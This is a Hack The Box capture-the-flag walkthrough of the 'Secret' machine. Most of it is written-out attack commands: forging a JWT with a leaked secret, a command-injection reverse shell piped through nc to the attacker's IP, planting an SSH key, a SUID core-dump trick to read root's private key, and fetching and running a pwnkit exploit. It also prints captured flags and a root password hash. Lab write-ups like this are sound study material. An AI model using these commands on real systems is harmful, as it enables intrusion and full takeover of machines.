Lance Grover

HTB – Secret – Walkthrough ( with the pwnkit option! LOL )


Now that pwnkit is out, I figured I should revisit some of the HTB boxes and see if it can be leveraged to get some easy root…LOL…and with Secret you can! I will also cover the method I used before pwnkit.

First, of course, I ran nmap -sC -sV 10.10.11.120 and checked out the websites with some enumeration, but what I found to play with was this API running on port 3000:

lanix@lgrover-lap-01:~/HTB/Secret$ curl -X POST http://10.10.11.120:3000/api/user/register -H 'Content-Type: application/json' -d '{"email":"root@dasiths.works","name":"tester","password":"Kekc8swFgD6zU"}'
{"user":"tester"}
lanix@lgrover-lap-01:~/HTB/Secret$

Now we log in:

lanix@lgrover-lap-01:~/HTB/Secret$ curl -X POST http://10.10.11.120:3000/api/user/login -H 'Content-Type: application/json' -d '{"email":"root@dasiths.works","password":"Kekc8swFgD6zU"}'
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiI2MWY2MmQ5OWNlOGYyMjA0NWNjYzE5MzgiLCJuYW1lIjoidGVzdGVyIiwiZW1haWwiOiJyb290QGRhc2l0aHMud29ya3MiLCJpYXQiOjE2NDM1MjM1MjR9.4_s-m8WD4yR9J8TID2Ydvd4C9Lj1xMGx34R_RAgl6wc
lanix@lgrover-lap-01:~/HTB/Secret$

Now we take that token and feed it to https://github.com/ticarpi/jwt_tool, changing the name claim to theadmin and re-signing it with the HS256 signing secret:

lanix@lgrover-lap-01:~/HTB/Secret$ python3 jwt_tool/jwt_tool.py -I -S hs256 -pc 'name' -pv 'theadmin' -p 'gXr67TtoQL8TShUc8XYsK2HvsBYfyQSFCFZe4MQp7gRpFuMkKjcM72CNQN4fMfbZEKx4i7YiWuNAkmuTcdEriCMm9vPAYkhpwPTiuVwVhvwE' eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiI2MWY2MmQ5OWNlOGYyMjA0NWNjYzE5MzgiLCJuYW1lIjoidGVzdGVyIiwiZW1haWwiOiJyb290QGRhc2l0aHMud29ya3MiLCJpYXQiOjE2NDM1MjM1MjR9.4_s-m8WD4yR9J8TID2Ydvd4C9Lj1xMGx34R_RAgl6wc

[jwt_tool banner] Version 2.2.4 @ticarpi

Original JWT: 

jwttool_f1454aca7ebd3cf03d089a425ba09757 - Tampered token - HMAC Signing:
[+] eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiI2MWY2MmQ5OWNlOGYyMjA0NWNjYzE5MzgiLCJuYW1lIjoidGhlYWRtaW4iLCJlbWFpbCI6InJvb3RAZGFzaXRocy53b3JrcyIsImlhdCI6MTY0MzUyMzUyNH0.PFHh-JBylEMpQScIUepfDr-81SLrtNBjY6A_z3vdYEg

Then we start our netcat listener:

nc -lpnv 1337

Now we exploit the logs endpoint to get a shell, using the token from above. The file parameter is passed to a shell unsanitized, so the payload is a reverse shell injected after a semicolon:

lanix@lgrover-lap-01:~/HTB/Secret$ curl 'http://10.10.11.120:3000/api/logs?file=;rm+%2Ftmp%2Ff%3Bmkfifo+%2Ftmp%2Ff%3Bcat+%2Ftmp%2Ff%7C%2Fbin%2Fsh+-i+2%3E%261%7Cnc+10.10.14.58+1337+%3E%2Ftmp%2Ff%0A%0A' -H 'auth-token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiI2MWY2MmQ5OWNlOGYyMjA0NWNjYzE5MzgiLCJuYW1lIjoidGhlYWRtaW4iLCJlbWFpbCI6InJvb3RAZGFzaXRocy53b3JrcyIsImlhdCI6MTY0MzUyMzUyNH0.PFHh-JBylEMpQScIUepfDr-81SLrtNBjY6A_z3vdYEg'

Now we create ourselves an entry in the authorized_keys file (first make sure the ~/.ssh directory exists):

$ echo "ssh-rsa AAAAB3NzaC1yc2EA**************************************************************A0XQ4GZT la@htb" >> authorized_keys

Now we can get the user.txt:

cat user.txt
cf3762b8cfd19834ad6543a16c297227

Then I looked for SUID executables and found /opt/count.

Using /opt/count, I had it read /root/.ssh/id_rsa, then in another shell I killed the process so it dumped core.
I went to /var/crash and ran apport-unpack _path_exe..crash /tmp/somedir, then used strings on the CoreDump to see the contents of the id_rsa file. With that key I could ssh directly in as root. I also used the same technique to read the /root/root.txt file, but wanted to get a shell as well.

Now let's use pwnkit to get root!

I created a .pwnkit directory on the target and pulled the files down from my own machine. On my local box I did:

git clone https://github.com/berdav/CVE-2021-4034.git
cd CVE-2021-4034
python3 -m http.server 8080

Then on the Secret.htb box I pulled down the 3 files, built them, and ran the exploit:

wget http://10.10.14.58:8080/Makefile
wget http://10.10.14.58:8080/cve-2021-4034.c
wget http://10.10.14.58:8080/pwnkit.c
make
./cve-2021-4034

Now I had a root shell!

dasith@secret:~/.pwnkit$ ./cve-2021-4034 
# id
uid=0(root) gid=0(root) groups=0(root),1000(dasith)
#

cat /root/root.txt
764cfded32d3eca063281c06174ba4ec

Further proof:

cat /etc/shadow

root:$6$/0f5J.S8.u.dA78h$xSyDRhh5Zf18Ha9XNVo5dvPhxnI0i7D/uD8T5FcYgN1FYMQbvkZakMgjgm3bhtS6hgKWBcD/QJqPgQR6cycFj.:18873:0:99999:7:::